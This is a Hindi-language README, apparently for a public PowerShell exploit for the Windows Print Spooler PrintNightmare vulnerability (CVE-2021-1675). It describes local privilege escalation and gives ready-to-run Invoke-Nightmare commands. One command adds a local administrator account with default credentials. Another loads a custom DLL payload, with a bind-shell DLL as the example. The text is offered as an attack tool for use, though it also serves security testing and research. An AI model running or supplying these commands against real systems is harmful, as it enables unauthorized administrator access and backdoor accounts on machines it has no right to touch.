
CVE-2021-1675 (PrintNightmare) के लिए PowerShell शोषण जो Print Spooler के माध्यम से स्थानीय विशेषाधिकार वृद्धि करता है, जिसमें कस्टम DLL पेलोड इंजेक्शन और स्थानीय व्यवस्थापक समूह में उपयोगकर्ता निर्माण शामिल है।
Caleb Stewart | John Hammond | June 1, 2021
CVE-2021-1675 एक गंभीर रिमोट कोड निष्पादन और स्थानीय विशेषाधिकार वृद्धि भेद्यता है जिसे "PrintNightmare" नाम दिया गया है।
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट्स जारी किए गए हैं (Python, C++) रिमोट कोड निष्पादन क्षमता के लिए, और एक C# rendition स्थानीय विशेषाधिकार वृद्धि के लिए। हमने शुद्ध PowerShell में एक देशी कार्यान्वयन नहीं देखा था, और हम एक्सप्लॉइट को परिष्कृत और पुनर्निर्मित करने का प्रयास करना चाहते थे।
यह PowerShell स्क्रिप्ट PrintNightmare हमला तकनीक के साथ स्थानीय विशेषाधिकार वृद्धि (LPE) करती है।

यह Windows Server 2016 और Windows Server 2019 पर परीक्षण किया गया है।
डिफ़ॉल्ट रूप से स्थानीय प्रशासकों समूह में एक नया उपयोगकर्ता जोड़ें:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
अपनी पसंद के अनुसार कुछ भी करने के लिए एक कस्टम DLL पेलोड प्रदान करें।
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"